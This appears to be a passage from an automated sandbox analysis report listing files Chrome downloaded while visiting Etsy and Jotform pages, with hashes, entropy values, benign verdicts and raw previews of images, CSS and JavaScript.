                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................n....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................n.mdat.....&ey_.....2.... ...A@.......%d.uc..%.E>]4..b...CR.vK!.V.....%..?...^;.g.........H.......E.k...I.(7...=.!:..../>.#.d..t...HTd...I#....xn.=7...g....(.%C..<...........$i..=..............]AP.g.q:.....r0.E.w. ].......>.\.'9...$.......V.k...R.1Y....)...|ec.2.^../8'....e.G.@.n.....Sy..Q....97..............F..zG6.NW*=\=.T.>.@.a....+.BN.....[z..vc~.uu.."....z.Eg.....hU<.<;.(U.,...y._.......E.Uk.I.X...G.I#1.A%x..;SW......,...1..u.a?..Q...h....B...M.:r....J.I.Q..U|.R..ABNp...(.....g.U...4..H2i.O..20......A..2...2.~...K.[.(..KO......|;G>^.....y..3.*.bxL.v.T.ZkJx@`h.U.w..$.iM5..=!.TY.G..f2O...............^..m.@~........."...d..........~.*l9+}.....i( ...8$...0....l.=...7S.5D........GH.1p.[.Q}...W.E
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):39404
                                                                                                                                                                              Entropy (8bit):7.992791187566133
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D4ADF531E7E71FC9CCE2CF30954C082C
                                                                                                                                                                              SHA1:66E9DFC06C2AD5B72A9EC1050F2F25E54E168606
                                                                                                                                                                              SHA-256:D337FBE4625DFF5C514725ED8693DD74079B8654C1EF9A933475DCA5C428AE29
                                                                                                                                                                              SHA-512:14426EFDCBB554D8FCEF5641786EC3D1E92C599630C08FAE752A86376FC13885BB49631071F9DF5CC7AA942A8C146A3824C8D8029DE5BD99A30DA251745B669C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/r/il/3ddb1a/5878161068/il_600x600.5878161068_l70t.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.......1@..h..#A.=rX.y"._o.F..r...(_.@.v.^..O.....`..,~,*.....k.k4t.._.$Z.!...B.cq....u...$.R.....C...GM. ..5..d.....@m..`.ur.^....H.V/.S.}"...5.QA.(..X.8..K..l.4;u..:..1.......&v.w{c.#....@q.[....R..].. I.u.A.;...#...9\..59..R...........:.......&.7...b.6a.e.W&......8n{.../....~.NaJ..0.>/..v..>....@6.....(h.x...P.~..M...6.h..t.<s.D......B.`..|.2z..Zc..!.a..-+........Z.U..u)...8MZ..~.."..1.=......:.Hk.4....g......l..]Q.{.r..PIg|....?..k.....c8..$..I.....v.C..~.....v~.a.W:-..ew..Pv...{..(....dp.....?....2l.jPuLv.>.=.....$.$z...|.^..6R.n_....]e4]9b..jk......f$....].).FA..Fw|Qy....4..*.G..|.O............O........1....Ab_8M....Ci.f.;W*....$..rk.=....!.e.+.}hL.67.....=I
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):98188
                                                                                                                                                                              Entropy (8bit):5.123474309520619
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F6DB430BA79A2C035AFDE0B52D7FCF8
                                                                                                                                                                              SHA1:42ED23BBEE3BCA003046D36288A173DD05ABACD3
                                                                                                                                                                              SHA-256:243FD8F95D37DEA526B24AA5A44E7B0196312ED83122E5A2E76A3E3E25818A71
                                                                                                                                                                              SHA-512:296DFE22C9C07A3DA2A99E111281E0D2C9A425BD1A8F7879BF22EAAA81E047B58902EDBE69BF7B84D7B4A291E796D19027E3BAC23537D41E297D316D57D3F197
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/neu/modules/listing_card_no_imports.00d19f16e05ad5,common/stars-svg.74cb1c37c4995e,neu/modules/favorite_listing_button.74cb1c37c4995e,neu/modules/quickview.74cb1c37c4995e,listzilla/responsive/listing-page-desktop.74cb1c37c4995e,web-toolkit-v2/modules/forms/radios.0bdecd6a071386,listing-page/image-carousel/responsive_no_imports.74cb1c37c4995e,listzilla/image-overlay-no-imports.74cb1c37c4995e,__modules__ListingPage__src__/ShopHeader/ReviewStars/review_stars.13a39be61e3c32,common/simple-overlay.b1c6bd381ce780,neu/payment_icons.2ec02d4eb6d23b,neu/apple_pay.2ec02d4eb6d23b,neu/google_pay.74cb1c37c4995e,listings3/checkout/single-listing-no-imports.74cb1c37c4995e,common/forms_no_import.74cb1c37c4995e,neu/klarna.2ec02d4eb6d23b,listzilla/responsive/review-content-modal.74cb1c37c4995e,appreciation_photos/photo_overlay.74cb1c37c4995e,listzilla/reviews/reviews_skeleton.2ec02d4eb6d23b,listzilla/reviews/reviews-section.74cb1c37c4995e,listzilla/listing-reviews.74cb1c37c4995e,reviews/subratings.74cb1c37c4995e,reviews/recommendation-signal.74cb1c37c4995e,web-toolkit-v2/modules/action_groups/action_groups.74cb1c37c4995e,listzilla/responsive/max-height-review.2ec02d4eb6d23b,sort-by-reviews.2ec02d4eb6d23b,listings3/machine_translation_notice.74cb1c37c4995e,web-toolkit-v2/modules/banners/banners.74cb1c37c4995e,neu/common/follow-shop-button.2ec02d4eb6d23b,category-nav/v2/breadcrumb_nav.5b4a38113e69c8,pages/join_neu/social/google_one_tap_modal.2ec02d4eb6d23b,shop2/modules/regulatory-seller-details.1b25a1a587b5a5,shop2/modules/seller-additional-details.38efeb0e152043,listzilla/responsive/tags.74cb1c37c4995e,__modules__ConditionalSaleInterstitial__src__/styles.170ea67d95e5e2,__modules__ListingPage__src__/WisdomOfTheCrowd/styles.74cb1c37c4995e,__modules__CollectionRecs__src__/Views/Grid/view.74cb1c37c4995e,__modules__CollectionRecs__src__/Views/Card/view.74cb1c37c4995e,__modules__ListingPage__src__/Recommendations/RecsRibbon/view.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview:.listing-card-animated-placeholder .v2-listing-card__img .height-placeholder{background:linear-gradient(90deg,#e1e3df 0%,#f0f0f0 15% 35%,#e1e3df 50%) 0 0/200%;border-radius:4px;animation-name:listingCardPlaceholderAnimationGradient;animation-duration:2s;animation-timing-function:cubic-bezier(.47,.01,.51,1);animation-iteration-count:infinite;animation-fill-mode:forwards}@keyframes listingCardPlaceholderAnimationGradient{0%{background-position:100% 0}to{background-position:-100% 0}}.placeholder{background:#ebebe6;position:relative}.placeholder:before{content:"";display:block}.placeholder.placeholder-square:before{padding:0 0 100%}.placeholder.placeholder-landscape:before{padding:0 0 79.412%}.placeholder.placeholder-listing:before{padding:0 0 115.438%}.placeholder .placeholder-content{position:absolute;top:0;bottom:0;left:0;right:0}.card-img-wrap{margin:0}.listing-card .discounted-price{color:#222}.listing-card .strike-through{text-decoration:line-through}.listing-card .discount-note{colo
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (2108)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2304
                                                                                                                                                                              Entropy (8bit):5.3538700603324845
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9ECDBA2D0241E4C3E555BF8191FD4CC2
                                                                                                                                                                              SHA1:5F844DA9CCD20B6FF207DC17B5E8B161D07168E6
                                                                                                                                                                              SHA-256:668BF27B566C65C5F0D5AC7A4183875E973294D479F579AD0E3DD069539F9146
                                                                                                                                                                              SHA-512:5DFE59D6D60BEF200AA4BF3231C892C2EC8BCDF1D59FB25D6714B28D2303BD8FA43E8C96953A6BA4B4E647DA2E45B0F3381694D0FAF3579B41D985F15C446ED2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"use strict";(self["jsonp-common-entrypoints"]=self["jsonp-common-entrypoints"]||[]).push([[1913],{97635:(e,t,r)=>{r.r(t);r.d(t,{CategoryNavigationLoader:()=>i});var n=r(86943);function a(e,t,r){t in e?Object.defineProperty(e,t,{value:r,enumerable:true,configurable:true,writable:true}):e[t]=r;return e}const s=0;const o={HEADER_WRAPPER:"[data-selector='header-cat-nav-wrapper']",OVERLAY:"[data-ui='overlay']"};class i{constructor(){a(this,"headerWrapper",void 0);this.headerWrapper=document.querySelector(o.HEADER_WRAPPER);this.setUpDarkBackgroundOverlay=this.setUpDarkBackgroundOverlay.bind(this);this.setUpFeaturedNodeBar=this.setUpFeaturedNodeBar.bind(this)}initNavEvents(){return Promise.allSettled([this.setUpFeaturedNodeBar(),this.setUpBreadcrumbsIfEligible(),this.setUpCategoryDropDownMenu(),this.setUpDarkBackgroundOverlay()])}setUpDarkBackgroundOverlay(){const e=document.querySelector(o.OVERLAY);return new Promise((t=>setTimeout((()=>{Promise.resolve().then(r.bind(r,23860)).then((({Overl
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (21855), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):21855
                                                                                                                                                                              Entropy (8bit):4.776589226290392
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:843A0939BB1E59C3917EFE4D4CC75367
                                                                                                                                                                              SHA1:F209D59F1C2F4E49F6AD5626F486E5F626322BD1
                                                                                                                                                                              SHA-256:4DC0C9A45CBB8306BBC0018189784AE7F5FCBCC54C37FEBF96A4F6128D049899
                                                                                                                                                                              SHA-512:0B02F6BDC14B0F0E594094D19DDC0977C48B139368CBA705C9C66CB4257142A149F35E9E04AC84FE4C6C1D42CDF799D25AFB6FE8457058B15FD456292142DD9D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/common/web-toolkit/modules/utility/svg_icons.74cb1c37c4995e,web-toolkit-v2/modules/buttons/buttons.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview:.etsy-icon{fill:currentColor;vertical-align:middle;width:24px;height:24px;display:inline-block}.etsy-icon svg{display:block}.etsy-icon.icon-smallest{width:12px;height:12px}.etsy-icon.icon-smaller{width:18px;height:18px}.etsy-icon.icon-larger{width:36px;height:36px}.etsy-icon.icon-largest{width:48px;height:48px}.wt-btn{--wt-btn-bg-color:unset;--wt-btn-bg-color-hover:unset;--wt-btn-border-color:unset;--wt-btn-border-color-hover:unset;--wt-btn-text-color:unset;--wt-btn-text-color-hover:unset;--wt-btn-scale:scaleX(1)scaleY(1)perspective(1px);--wt-btn-scale-hover:scaleX(1.015)scaleY(1.035)perspective(1px);--wt-btn-scale-active:scaleX(1)scaleY(1)perspective(1px);color:var(--wt-btn-text-color);font:inherit;cursor:pointer;text-align:center;-webkit-tap-highlight-color:#0000;-webkit-appearance:none;vertical-align:middle;z-index:10;background:0 0;border:none;border-radius:24px;outline:none;min-width:48px;min-height:48px;padding:12px 18px;font-size:16px;font-weight:500;line-height:1.5;text-decorat
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15653
                                                                                                                                                                              Entropy (8bit):7.91154025535613
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B76296073E4CAF73011F51E590183773
                                                                                                                                                                              SHA1:235CDD4D826A4D7727719A05AB87A53B12FE4BF7
                                                                                                                                                                              SHA-256:B790A949B8FCF4125E2E492029F5B987CAA142DB2A0186996C9AF2284C808855
                                                                                                                                                                              SHA-512:A99623B7D16035367A0D1710EDAE52C12ECFB4963BBF2F4E15E17A6DD5DE5E684981D9AD4E10D5BC73DFD09A5AA1D2DE24DE617A2BAFF2DB83E79899C3719761
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................=.........................!.1A.Q."aq..2#B...R..$3br......4..................................2.......................!1.AQ.q."2a.B...#.3b..4R.............?..TQEH.QE..R.Q@.E%...RQ@....B.IE..QE..RQ@...(.QE..QE..QE..QE%.......(...(......4..RQKLF4QE1.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13280
                                                                                                                                                                              Entropy (8bit):7.973828343439466
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:78B7E42D977E0255C2CFB1D6B50D98E9
                                                                                                                                                                              SHA1:8E77890D37335A73A969BA56EE8EE3205F4D2CC0
                                                                                                                                                                              SHA-256:F17328A7A303825FC87AA79B1E026255417E162E724DA348C88A91337D4A166E
                                                                                                                                                                              SHA-512:281F1A90ECF89CC85DBE2404F2157EF5C59685409083645C21DF26D49FA02D5F370F11740E6EE56F38A84574FC079C102A543F7701F53551FEBA38217F57F8BD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/4d631f/6053547883/iap_200x200.6053547883_m198mr6b.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................2....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma.................2.mdat......... !..2.e.....a@.+t.d..k.k?.. .^(.]..c$.h\....\6.V..G;v....T3.{.2m&.J.8.b..........u...3\F.......... .A"ga........f.B..O..].]....G.....8.....*1.k.ts..r6...H...4....G.`#Vg..C:XA......t..E..>....b.S"c....T...,.V<.....k..5Q.}.W.-".g..l.u0N....G.*.v......'d..../.......`J_*{.PZ..,.R..o.._.q..\^sz...'..*.@.+....l..G..K.[..r.....l..2.=.k....*i....<.SK.......%.%qv5.&cV..<.....0C...C. ..=r...Gn.....1.z$.>[.?.%......D.g..'.0..0...u..I..E...7.O...]K...@@...u.P...[y.>P.@. +-.....o.v.X../....6.d.\....r.......F..P.h.....A_...i._.F.j.<......t..R.+..._.....Q..=...T..M....<.J.E...[=.=.....Y..R.kD..X.7.....A......iK..$.Y..*A.v..#......."~9.b.-.#9....^,$..p.h...B.g.~.B..=.2....z}.Y.p.d.. ..62........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26167
                                                                                                                                                                              Entropy (8bit):7.956197755442197
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:196F574AEDCAB0C3413FEC45BE4C78BF
                                                                                                                                                                              SHA1:E4CF39140B14BC6D35093ADC96FC0CA63B95AA95
                                                                                                                                                                              SHA-256:E3B15F3F2905910B725943836E953D2CC7A7B33DEF38228D07F410B4CF736C2D
                                                                                                                                                                              SHA-512:6383C3C85DA2F0C3F747CF9F8477E16E29E7730622742750EC4796E45322630F6C647A4716E171C93C73DBC928B4D5B2F1D3FAD4E593672276CF4D7636B58DE5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,.."........................................D.........................!1A.."Q.2aq.....#B..Rb..$3r..4.....Cc.%s................................5.......................!1.A."Qaq2......#BR.b....3r.............?.}c.X...Sc.X..Y./g.Z..S.........).....br...(.xM.I...5..Q.H.u./m..].^..^d.%{.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18171
                                                                                                                                                                              Entropy (8bit):7.931254094233277
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:976687C7C911596A128C6BEA2D7AB435
                                                                                                                                                                              SHA1:D90E444718582758BEF9E2598505E1D2748F47FC
                                                                                                                                                                              SHA-256:66F10998F7861FA1A3DD4301D3F6A9F61F5ECE0181994DFB4517CA7E126DBC51
                                                                                                                                                                              SHA-512:F2B6BB8FAC0F36306100547B59C506F9F5242632596672DB2F18E370388788D5630C9BB1A8F084DBFEAC475FC3694AAE2C2FB948181FAED894253C60391F04D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................G...........................!1."2AQaqr..s...#$34B...Rb...CDc..S....%5T................................).......................!1A...Q"2q...aB.............?....}@}Ng.=c." T>.3...zd...A..`..A..P.........D7.9.x=...D".0..`I.=":....$.#..:=.`...a]G.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5460), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5460
                                                                                                                                                                              Entropy (8bit):5.855569897294449
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9D6AEB4BEC8217F1E861155614708734
                                                                                                                                                                              SHA1:342C91ED460931176B9D8F0154E08F44B2D5649D
                                                                                                                                                                              SHA-256:5244BF4094619DA771970E6E7AB061D62702E03BB2E5FAB42071BD016C4EA0DC
                                                                                                                                                                              SHA-512:62952681FBB2FBBBB328D24507B72A9FFE68450DA68DE4AEFBAE5EDCD3A6AC764B46772F0046AAB288582F6CF38CFAF039EF37CC70211B6A447348B11E4E926E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):11608
                                                                                                                                                                              Entropy (8bit):7.898402627283225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AC99B069B865A401EF088D58A7FBA006
                                                                                                                                                                              SHA1:24EC9676E4C51CA71882E7EA891ADC284CFB65A8
                                                                                                                                                                              SHA-256:5FA6EA5C305376D31E0317776FFF3DBAC703D7FCBFDAF89113A22FCC6FFDC338
                                                                                                                                                                              SHA-512:F84700D37C0C2183D45AA06D2961B5DC26074314469543B91ED0E224A21A18F77918DC7289645A1E24ED4730883E50374814CF0BA0FFC9EE9CF747EF8D77904F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,.."........................................K........................!1..AQ.aq.."s....$234BSrt.....#%5CRTb.c.......Dd..............................&.....................!1..2Aq"Qa..B..............?......<...!...I.R....3S..B..@..S.B.. |..4*B....R/c.lRG.. ... ...... .tK.B...N.~(.!$.......q>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):56157
                                                                                                                                                                              Entropy (8bit):7.955680554287869
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:34953AFDF25A7599F68957B0A3CE1276
                                                                                                                                                                              SHA1:CBCFE3737FC21E8A9805C27DD33FA7A11C3BD11B
                                                                                                                                                                              SHA-256:924563C2CC39431CD7761A2A316B09E4EC15561B4FC77E66615767002848BAC4
                                                                                                                                                                              SHA-512:B5540EEC9EF22A9BB53A505E7F6E8D0B0C35CA3CC0226EBF3F237F8EF8895F780E13C9B974ABBEDBDC055DEF9C26FB3C8549FE55E4030F9DEC4AAD4C3EF3DB7C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................?.........................!1A.."Qa.q.2.#B.......3R..$b.r..Cd..................................0.......................!1.AQaq.."2..B.#..3R..C............?.......=/.h.t.....*zj.T..M@..4.........7Jz](.b....M@..=/..5*T...../.J.....8....).....zB.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7326
                                                                                                                                                                              Entropy (8bit):7.945845372637444
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B39744075CCB7892B28463A081FC0C67
                                                                                                                                                                              SHA1:FEDBF295259537BEF7B24FE1793B418FE5B59149
                                                                                                                                                                              SHA-256:F03A576401647B2A369E2B834E8A989F1BC8E7BEE4FC8E906EDA492E597984A7
                                                                                                                                                                              SHA-512:2B1B412B0792B0B9CF5A7DE3A98C1581ED5C0A48F074AAD67D7CB0848991AAABA49DB05DAFA64F189B4A307CC57CC41025710FBD8E83887863FAC52E9C1913B3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5465902/r/il/45be5a/364465166/il_340x270.364465166_io7f.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma...................mdat....."*p...h4 2.6Dh.a..P.^....B.l.j...b........1d{.oaL....e..C.....A.EDt....7.Fs9.uE.YI.)..X..,c2l.pu..'....[.....2?......h...i.W..V...../6..R19....l.M.08.5...r.......'n.....HN....q.I.G.....5....{....j.....L...(...j..I.&.....]r.~.2.k....v...........1;.m.ph..Q...|.K8~.I^./..]=.<..[......mD.[h.=O.. ..#..T..W..E.d.V..Vq..fqf..^..l.O(..rBQ...v2..8.....M.....$8<..9.ND..GQ...{./.[A._+.S..4.....0."SD........`.w(...V.....gL./!>C0h..v.b.'.B}..]5Z.A.b..cnRF..-.<..."O.K&R.\...I..G2O.-y.i .-@.Q...a.y..I.<.#/....]j........2#...9......$...*.!.<......P..o..$I]Y.c+l....}T k.H...z.....\Y....e...D}MaW1.>$_h...p.Vu....Pa\...0........>..z.m...'\..x...(.z.y.....'.^f...Y..."\..;,....g.}lJ....eU..yQ..G..]I.Cp.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3168), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3168
                                                                                                                                                                              Entropy (8bit):4.96213739645873
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4821AF91EA69D4B12822A1B7FD116EE1
                                                                                                                                                                              SHA1:CF453003E8727081FCF75A1A0E683FB1534E5240
                                                                                                                                                                              SHA-256:D4E193083A57FFD9E7CE23B7347A2DD1F63F8D36961301E48F74B52889599C1C
                                                                                                                                                                              SHA-512:26C57E5BAEB3A90643F55D2525C422A88C144E20996DAADFC34059289A67333D7C9517A46F41CFB332D9C2C93FBAB542F49499465DEC098C86D159D3AF8D3417
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn01.jotfor.ms/stylebuilder/static/form-common.css?v=3c1609c
                                                                                                                                                                              Preview:.app.isBuilder .form-all{margin:0 auto 20px!important}.formPage-container .formPage-each:not(:first-of-type) .form-all:before{display:none}.form-cover-wrapper+.form-all{margin-top:0}.form-cover-wrapper+.form-all:before{content:none}.form-cover-wrapper{margin:0 auto 32px;padding-top:32px;position:relative;overflow:hidden;transition:all .33s ease}.form-cover-wrapper.form-page-cover-image-align-left .form-page-cover-image-wrapper{-ms-flex-pack:start;justify-content:flex-start}.form-cover-wrapper.form-page-cover-image-align-center .form-page-cover-image-wrapper{-ms-flex-pack:center;justify-content:center}.form-cover-wrapper.form-page-cover-image-align-right .form-page-cover-image-wrapper{-ms-flex-pack:end;justify-content:flex-end}.form-cover-wrapper .form-page-cover-text{line-height:50px}.form-cover-wrapper .add-form-logo{display:-ms-flexbox;display:flex;background-repeat:no-repeat;border:0;background-color:transparent;padding-block:0;padding-inline:0}.form-page-cover-image-wrapper{width:1
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):56260
                                                                                                                                                                              Entropy (8bit):7.9567674171205365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8CFDBEA5A7EA0770F82111B7D987F5E9
                                                                                                                                                                              SHA1:0CAA9D37EB052E767BCC7049416EA8A87ACD5EC5
                                                                                                                                                                              SHA-256:48A598CBDF1EC5325554A2D6D4529DB8E3963A8687E40B6913886F36B6BAA362
                                                                                                                                                                              SHA-512:AB818654E920FF385B99117DAABA48692CFB244FC21F720241A2D013A1D1BB1691EBECD690FD1E517E02DF0BDAECEB3E64C7716D2C30CE56A6AE504AF2FF68B3
                                                                                                                                                                              Malicious:false
